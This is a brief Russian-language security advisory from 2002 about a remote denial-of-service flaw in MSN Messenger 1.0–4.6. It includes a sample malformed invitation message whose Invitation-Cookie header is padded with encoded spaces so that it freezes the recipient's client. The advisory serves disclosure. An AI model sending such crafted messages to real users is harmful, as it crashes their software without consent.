Удаленный DoS через некорректный заголовок Invitation-Cookie в MSN Messenger
| Дата публикации: | 27.05.2002 |
| Всего просмотров: | 1316 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Msn Messenger - популярный интернет пейджер от Microsoft для Windows систем.
Уродливый запрос, содержащий закодированные символы пробела (%20) в поле Invitation-Cookie, посланный удаленному пользователю, может привести к зависанию клиента Microsoft MSN Messenger. Уязвимость обнаружена в Microsoft MSN Messenger Service 1.0-4.6 Пример:
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8
Application-Name: Remote Assistance
Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc}
Session-Protocol: SM1
Application-URL: http://www.microsoft.com
Invitation-Command: INVITE
Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B}
|
| Ссылки: | Misformated message header causes msn messenger to crash |